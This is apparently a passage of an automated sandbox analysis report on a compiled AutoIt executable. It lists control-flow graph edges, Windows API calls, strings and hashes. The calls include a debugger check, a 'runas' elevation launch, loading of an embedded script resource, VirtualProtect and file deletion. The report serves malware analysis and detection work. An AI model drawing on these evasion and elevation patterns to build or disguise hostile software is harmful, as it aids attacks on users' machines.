65c2e0 103953->103985 104017 647956 103953->104017 104023 63617e 103953->104023 104028 65c193 85 API calls 2 library calls 103953->104028 103954 636e8f 59 API calls 103954->103957 103956->103953 103957->103937 103957->103939 103957->103941 103957->103942 103957->103944 103957->103949 103957->103951 103957->103952 103957->103954 103957->103955 103958 602d40 67 API calls __cinit 103957->103958 103959 6209d6 103957->103959 104026 5ec8c0 331 API calls 2 library calls 103957->104026 103958->103957 104033 649e4a 89 API calls 4 library calls 103959->104033 103961->103953 103963->103953 104027 5ef6a3 331 API calls 103964->104027 103965->103953 103968 5e9c90 Mailbox 59 API calls 103967->103968 103968->103971 104031 649e4a 89 API calls 4 library calls 103969->104031 103971->103932 103971->103955 103973 5e9d3c 60 API calls 103972->103973 103974 5eb22d 103973->103974 103976 5e9d3c 60 API calls 103974->103976 103975->103953 103976->103964 104035 65cadd 103979->104035 103981 65df47 103981->103953 103983 65cadd 130 API calls 103982->103983 103984 65df33 103983->103984 103984->103953 103986 5e7667 59 API calls 103985->103986 103987 65c2f4 103986->103987 103988 5e7667 59 API calls 103987->103988 103989 65c2fc 103988->103989 103990 5e7667 59 API calls 103989->103990 103991 65c304 103990->103991 103992 5e9837 84 API calls 103991->103992 104006 65c312 103992->104006 103993 5e7bcc 59 API calls 103993->104006 103994 65c4fb 103995 65c528 Mailbox 103994->103995 104126 5e9a3c 59 API calls Mailbox 103994->104126 103995->103953 103996 65c4e2 103998 5e7cab 59 API calls 103996->103998 104002 65c4ef 103998->104002 103999 5e7924 59 API calls 103999->104006 104000 65c4fd 104003 5e7cab 59 API calls 104000->104003 104001 5e8047 59 API calls 104001->104006 104004 5e7b2e 59 API calls 104002->104004 104005 65c50c 104003->104005 104004->103994 104008 5e7b2e 59 API calls 104005->104008 104006->103993 104006->103994 104006->103995 104006->103996 104006->103999 104006->104000 104006->104001 104007 5e7e4f 59 API calls 104006->104007 104009 5e7e4f 59 API calls 104006->104009 104014 5e9837 84 API calls 104006->104014 104015 5e7cab 59 API calls 104006->104015 104016 5e7b2e 59 API calls 104006->104016 104010 65c3a9 CharUpperBuffW 104007->104010 104008->103994 104011 65c469 CharUpperBuffW 104009->104011 104124 5e843a 68 API calls 104010->104124 104125 5ec5a7 69 API calls 2 library calls 104011->104125 104014->104006 104015->104006 104016->104006 104018 647962 104017->104018 104019 600db6 Mailbox 59 API calls 104018->104019 104020 647970 104019->104020 104021 64797e 104020->104021 104022 5e7667 59 API calls 104020->104022 104021->103953 104022->104021 104127 6360c0 104023->104127 104025 63618c 104025->103953 104026->103957 104027->103934 104028->103953 104029->103945 104030->103971 104031->103971 104032->103955 104033->103938 104034->103955 104036 5e9837 84 API calls 104035->104036 104037 65cb1a 104036->104037 104041 65cb61 Mailbox 104037->104041 104073 65d7a5 104037->104073 104039 65cf2e 104111 65d8c8 92 API calls Mailbox 104039->104111 104041->103981 104043 65cf3d 104045 65cdc7 104043->104045 104046 65cf49 104043->104046 104044 65cbb2 Mailbox 104044->104041 104047 5e9837 84 API calls 104044->104047 104060 65cdb9 104044->104060 104105 65fbce 59 API calls 2 library calls 104044->104105 104106 65cfdf 61 API calls 2 library calls 104044->104106 104086 65c96e 104045->104086 104046->104041 104047->104044 104052 65ce00 104101 600c08 104052->104101 104055 65ce33 104058 5e92ce 59 API calls 104055->104058 104056 65ce1a 104107 649e4a 89 API calls 4 library calls 104056->104107 104061 65ce3f 104058->104061 104059 65ce25 GetCurrentProcess TerminateProcess 104059->104055 104060->104039 104060->104045 104062 5e9050 59 API calls 104061->104062 104063 65ce55 104062->104063 104072 65ce7c 104063->104072 104108 5e8d40 59 API calls Mailbox 104063->104108 104065 65cfa4 104065->104041 104069 65cfb8 FreeLibrary 104065->104069 104066 65ce6b 104109 65d649 107 API calls _free 104066->104109 104069->104041 104071 5e9d3c 60 API calls 104071->104072 104072->104065 104072->104071 104110 5e8d40 59 API calls Mailbox 104072->104110 104112 65d649 107 API calls _free 104072->104112 104074 5e7e4f 59 API calls 104073->104074 104075 65d7c0 CharLowerBuffW 104074->104075 104113 63f167 104075->104113 104079 5e7667 59 API calls 104080 65d7f9 104079->104080 104081 5e784b 59 API calls 104080->104081 104082 65d810 104081->104082 104083 5e7d2c 59 API calls 104082->104083 104084 65d81c Mailbox 104083->104084 104085 65d858 Mailbox 104084->104085 104120 65cfdf 61 API calls 2 library calls 104084->104120 104085->104044 104087 65c9de 104086->104087 104088 65c989 104086->104088 104092 65da50 104087->104092 104089 600db6 Mailbox 59 API calls 104088->104089 104091 65c9ab 104089->104091 104090 600db6 Mailbox 59 API calls 104090->104091 104091->104087 104091->104090 104093 65dc79 Mailbox 104092->104093 104100 65da73 _strcat _wcscpy __NMSG_WRITE 104092->104100 104093->104052 104094 5e9b3c 59 API calls 104094->104100 104095 5e9be6 59 API calls 104095->104100 104096 5e9b98 59 API calls 104096->104100 104097 60571c 58 API calls __malloc_crt 104097->104100 104098 5e9837 84 API calls 104098->104100 104100->104093 104100->104094 104100->104095 104100->104096 104100->104097 104100->104098 104123 645887 61 API calls 2 library calls 104100->104123 104103 600c1d 104101->104103 104102 600cb5 VirtualProtect 104104 600c83 104102->104104 104103->104102 104103->104104 104104->104055 104104->104056 104105->104044 104106->104044 104107->104059 104108->104066 104109->104072 104110->104072 104111->104043 104112->104072 104114 63f192 __NMSG_WRITE 104113->104114 104115 63f1d1 104114->104115 104118 63f1c7 104114->104118 104119 63f278 104114->104119 104115->104079 104115->104084 104118->104115 104121 5e78c4 61 API calls 104118->104121 104119->104115 104122 5e78c4 61 API calls 104119->104122 104120->104085 104121->104118 104122->104119 104123->104100 104124->104006 104125->104006 104126->103995 104128 6360e8 104127->104128 104129 6360cb 104127->104129 104128->104025 104129->104128 104131 6360ab 59 API calls Mailbox 104129->104131 104131->104129

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005E3B68
                                                      • IsDebuggerPresent.KERNEL32 ref: 005E3B7A
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,006A52F8,006A52E0,?,?), ref: 005E3BEB
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                        • Part of subcall function 005F092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005E3C14,006A52F8,?,?,?), ref: 005F096E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005E3C6F
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00697770,00000010), ref: 0061D281
                                                      • SetCurrentDirectoryW.KERNEL32(?,006A52F8,?,?,?), ref: 0061D2B9
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00694260,006A52F8,?,?,?), ref: 0061D33F
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0061D346
                                                        • Part of subcall function 005E3A46: GetSysColorBrush.USER32(0000000F), ref: 005E3A50
                                                        • Part of subcall function 005E3A46: LoadCursorW.USER32(00000000,00007F00), ref: 005E3A5F
                                                        • Part of subcall function 005E3A46: LoadIconW.USER32(00000063), ref: 005E3A76
                                                        • Part of subcall function 005E3A46: LoadIconW.USER32(000000A4), ref: 005E3A88
                                                        • Part of subcall function 005E3A46: LoadIconW.USER32(000000A2), ref: 005E3A9A
                                                        • Part of subcall function 005E3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005E3AC0
                                                        • Part of subcall function 005E3A46: RegisterClassExW.USER32(?), ref: 005E3B16
                                                        • Part of subcall function 005E39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E3A03
                                                        • Part of subcall function 005E39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3A24
                                                        • Part of subcall function 005E39D5: ShowWindow.USER32(00000000,?,?), ref: 005E3A38
                                                        • Part of subcall function 005E39D5: ShowWindow.USER32(00000000,?,?), ref: 005E3A41
                                                        • Part of subcall function 005E434A: _memset.LIBCMT ref: 005E4370
                                                        • Part of subcall function 005E434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E4415
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%g
                                                      • API String ID: 529118366-2073506830
                                                      • Opcode ID: 5e9879ce73c9c133f82d38e2aebab08e6ae8effb0e180a4b39bb7c07a34294f0
                                                      • Instruction ID: fa6d9bc08e1c05228a67a128ed49fe9fcd934e2b2eaae53894fdac82e2e48bdc
                                                      • Opcode Fuzzy Hash: 5e9879ce73c9c133f82d38e2aebab08e6ae8effb0e180a4b39bb7c07a34294f0
                                                      • Instruction Fuzzy Hash: 5B511631908189AECF04FBB5EC09AED7F7ABF8A700F145065F596A3162DA709B45CF20

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1037 5e49a0-5e4a00 call 5e7667 GetVersionExW call 5e7bcc 1042 5e4b0b-5e4b0d 1037->1042 1043 5e4a06 1037->1043 1044 61d767-61d773 1042->1044 1045 5e4a09-5e4a0e 1043->1045 1046 61d774-61d778 1044->1046 1047 5e4a14 1045->1047 1048 5e4b12-5e4b13 1045->1048 1050 61d77b-61d787 1046->1050 1051 61d77a 1046->1051 1049 5e4a15-5e4a4c call 5e7d2c call 5e7726 1047->1049 1048->1049 1059 61d864-61d867 1049->1059 1060 5e4a52-5e4a53 1049->1060 1050->1046 1053 61d789-61d78e 1050->1053 1051->1050 1053->1045 1055 61d794-61d79b 1053->1055 1055->1044 1057 61d79d 1055->1057 1061 61d7a2-61d7a5 1057->1061 1062 61d880-61d884 1059->1062 1063 61d869 1059->1063 1060->1061 1064 5e4a59-5e4a64 1060->1064 1065 61d7ab-61d7c9 1061->1065 1066 5e4a93-5e4aaa GetCurrentProcess IsWow64Process 1061->1066 1071 61d886-61d88f 1062->1071 1072 61d86f-61d878 1062->1072 1067 61d86c 1063->1067 1068 5e4a6a-5e4a6c 1064->1068 1069 61d7ea-61d7f0 1064->1069 1065->1066 1070 61d7cf-61d7d5 1065->1070 1073 5e4aaf-5e4ac0 1066->1073 1074 5e4aac 1066->1074 1067->1072 1075 61d805-61d811 1068->1075 1076 5e4a72-5e4a75 1068->1076 1079 61d7f2-61d7f5 1069->1079 1080 61d7fa-61d800 1069->1080 1077 61d7d7-61d7da 1070->1077 1078 61d7df-61d7e5 1070->1078 1071->1067 1081 61d891-61d894 1071->1081 1072->1062 1082 5e4b2b-5e4b35 GetSystemInfo 1073->1082 1083 5e4ac2-5e4ad2 call 5e4b37 1073->1083 1074->1073 1087 61d813-61d816 1075->1087 1088 61d81b-61d821 1075->1088 1084 61d831-61d834 1076->1084 1085 5e4a7b-5e4a8a 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1072 1086 5e4af8-5e4b08 1082->1086 1094 5e4b1f-5e4b29 GetSystemInfo 1083->1094 1095 5e4ad4-5e4ae1 call 5e4b37 1083->1095 1084->1066 1093 61d83a-61d84f 1084->1093 1090 61d826-61d82c 1085->1090 1091 5e4a90 1085->1091 1087->1066 1088->1066 1090->1066 1091->1066 1096 61d851-61d854 1093->1096 1097 61d859-61d85f 1093->1097 1098 5e4ae9-5e4aed 1094->1098 1102 5e4b18-5e4b1d 1095->1102 1103 5e4ae3-5e4ae7 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1098->1086 1100 5e4aef-5e4af2 FreeLibrary 1098->1100 1100->1086 1102->1103 1103->1098
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 005E49CD
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      • GetCurrentProcess.KERNEL32(?,0066FAEC,00000000,00000000,?), ref: 005E4A9A
                                                      • IsWow64Process.KERNEL32(00000000), ref: 005E4AA1
                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 005E4AE7
                                                      • FreeLibrary.KERNEL32(00000000), ref: 005E4AF2
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 005E4B23
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 005E4B2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 566fd9f0d200d867985149dd3d31618bdf273d82acf642f45e56c71c86e35505
                                                      • Instruction ID: 9244a7205347cacc188ededf8e79203d8b0009e74561a549b1159ac485cc0cf3
                                                      • Opcode Fuzzy Hash: 566fd9f0d200d867985149dd3d31618bdf273d82acf642f45e56c71c86e35505
                                                      • Instruction Fuzzy Hash: B491D2319897C0DECB35DB6994501EEFFF6BF2A310B484DAED0C693B41D220A548DB69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1104 5e4e89-5e4ea1 CreateStreamOnHGlobal 1105 5e4ea3-5e4eba FindResourceExW 1104->1105 1106 5e4ec1-5e4ec6 1104->1106 1107 61d933-61d942 LoadResource 1105->1107 1108 5e4ec0 1105->1108 1107->1108 1109 61d948-61d956 SizeofResource 1107->1109 1108->1106 1109->1108 1110 61d95c-61d967 LockResource 1109->1110 1110->1108 1111 61d96d-61d98b 1110->1111 1111->1108
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005E4D8E,?,?,00000000,00000000), ref: 005E4E99
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005E4D8E,?,?,00000000,00000000), ref: 005E4EB0
                                                      • LoadResource.KERNEL32(?,00000000,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F), ref: 0061D937
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F), ref: 0061D94C
                                                      • LockResource.KERNEL32(005E4D8E,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F,00000000), ref: 0061D95F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 090975a71a934f2ebf42794d73f6f66cf6fa64ebc8e9b058efcece0c0c880479
                                                      • Instruction ID: ddf54b23f9cc2f97b45be077eb67f52b871232bde91c42915661700b0cdf1383
                                                      • Opcode Fuzzy Hash: 090975a71a934f2ebf42794d73f6f66cf6fa64ebc8e9b058efcece0c0c880479
                                                      • Instruction Fuzzy Hash: EE115A75240740BFD7258BA6EC48F677BBEFBC5B11F20466CF446C6250DBA1EC008A61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HW$%g
                                                      • API String ID: 3964851224-1916039323
                                                      • Opcode ID: effa6bbe48479e5ee1529d0f9429765c3cb73b8a0258146eac6d1a30ef80ebb1
                                                      • Instruction ID: 24a536c09ecb6515bc49d0525c3050c77f4353d136e562bb756b0cdcfd1127fa
                                                      • Opcode Fuzzy Hash: effa6bbe48479e5ee1529d0f9429765c3cb73b8a0258146eac6d1a30ef80ebb1
                                                      • Instruction Fuzzy Hash: B6928A706087518FD724DF14C484B6ABBE1BF85304F18896DE98A8B3A2DB75EC45CF92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Ddj$Ddj$Ddj$Ddj$HW$Variable must be of type 'Object'.
                                                      • API String ID: 0-3052281558
                                                      • Opcode ID: 0355d5235809e92e9afb831bae82b328b260d8ba86a0426b83a81538b1b3ef40
                                                      • Instruction ID: 5c6f50b2d74179686d4ad9465dd98bc5765475352bcdb3093eeb1b466dd0137d
                                                      • Opcode Fuzzy Hash: 0355d5235809e92e9afb831bae82b328b260d8ba86a0426b83a81538b1b3ef40
                                                      • Instruction Fuzzy Hash: C8A2BF74A10256CFCB28CF56C485AAEBBB2FF59310F248469E895AB351D734ED42CF90
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,0061E398), ref: 0064446A
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0064447B
                                                      • FindClose.KERNEL32(00000000), ref: 0064448B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 8940aacbd75c98c13a689f94953061e4d3c708fddad7c3e46271f5ac3b3f5a43
                                                      • Instruction ID: 2bc562da2dad52cbd0e49b1eb1ee844cb617ddcd90446533a3fb4279b749fab5
                                                      • Opcode Fuzzy Hash: 8940aacbd75c98c13a689f94953061e4d3c708fddad7c3e46271f5ac3b3f5a43
                                                      • Instruction Fuzzy Hash: 10E0D836410500A743106B78FC1E5E97B9EDF05335F100716F835C11D0EBF45D0099D5
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005F0A5B
                                                      • timeGetTime.WINMM ref: 005F0D16
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005F0E53
                                                      • Sleep.KERNEL32(0000000A), ref: 005F0E61
                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 005F0EFA
                                                      • DestroyWindow.USER32 ref: 005F0F06
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005F0F20
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00624E83
                                                      • TranslateMessage.USER32(?), ref: 00625C60
                                                      • DispatchMessageW.USER32(?), ref: 00625C6E
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00625C82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$HW
                                                      • API String ID: 4212290369-792253620
                                                      • Opcode ID: 538b50749a0d35c8b237e1600a7f2d68963a6fe2dc3db6aa501463db30805a86
                                                      • Instruction ID: 4fcce52d8fe880715290282c04d011b762f16554e32e9e2c2840c08c522e2a64
                                                      • Opcode Fuzzy Hash: 538b50749a0d35c8b237e1600a7f2d68963a6fe2dc3db6aa501463db30805a86
                                                      • Instruction Fuzzy Hash: 13B2C270608B52DFD728DF24D844BAABBE6BF84304F14491DF59A972A2CB74E845CF42

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00648F5F: __time64.LIBCMT ref: 00648F69
                                                        • Part of subcall function 005E4EE5: _fseek.LIBCMT ref: 005E4EFD
                                                      • __wsplitpath.LIBCMT ref: 00649234
                                                        • Part of subcall function 006040FB: __wsplitpath_helper.LIBCMT ref: 0060413B
                                                      • _wcscpy.LIBCMT ref: 00649247
                                                      • _wcscat.LIBCMT ref: 0064925A
                                                      • __wsplitpath.LIBCMT ref: 0064927F
                                                      • _wcscat.LIBCMT ref: 00649295
                                                      • _wcscat.LIBCMT ref: 006492A8
                                                        • Part of subcall function 00648FA5: _memmove.LIBCMT ref: 00648FDE
                                                        • Part of subcall function 00648FA5: _memmove.LIBCMT ref: 00648FED
                                                      • _wcscmp.LIBCMT ref: 006491EF
                                                        • Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649824
                                                        • Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649837
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00649452
                                                      • _wcsncpy.LIBCMT ref: 006494C5
                                                      • DeleteFileW.KERNEL32(?,?), ref: 006494FB
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00649511
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00649522
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00649534
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: a99b3817fff3b1b9f88ebf32defd8b287d18b253b9a0b5d38ba66d7bf9376b82
                                                      • Instruction ID: 1e2e45311d6203fd07595989de269cbcf7278736b3576905beccd78769b29d73
                                                      • Opcode Fuzzy Hash: a99b3817fff3b1b9f88ebf32defd8b287d18b253b9a0b5d38ba66d7bf9376b82
                                                      • Instruction Fuzzy Hash: FFC14CB1D40219AADF25DF95CC85ADFBBBEEF85310F0040AAF609E7241DB709A448F65

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 005E3074
                                                      • RegisterClassExW.USER32(00000030), ref: 005E309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
                                                      • LoadIconW.USER32(000000A9), ref: 005E30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: afd6f0482b0a1858f40554e5bff0b531e327625f8a9380896883fe77519d1d84
                                                      • Instruction ID: 08b5a0df119ccc5a812be27ace4434a918a53995d7a03bd40d0022a4bff056f2
                                                      • Opcode Fuzzy Hash: afd6f0482b0a1858f40554e5bff0b531e327625f8a9380896883fe77519d1d84
                                                      • Instruction Fuzzy Hash: EF317671845348AFDB00DFA4EC89AD9BFF2FB0A310F14552EE581E62A1D3B91540CF50

                                                      Control-flow Graph

                                                      APIs
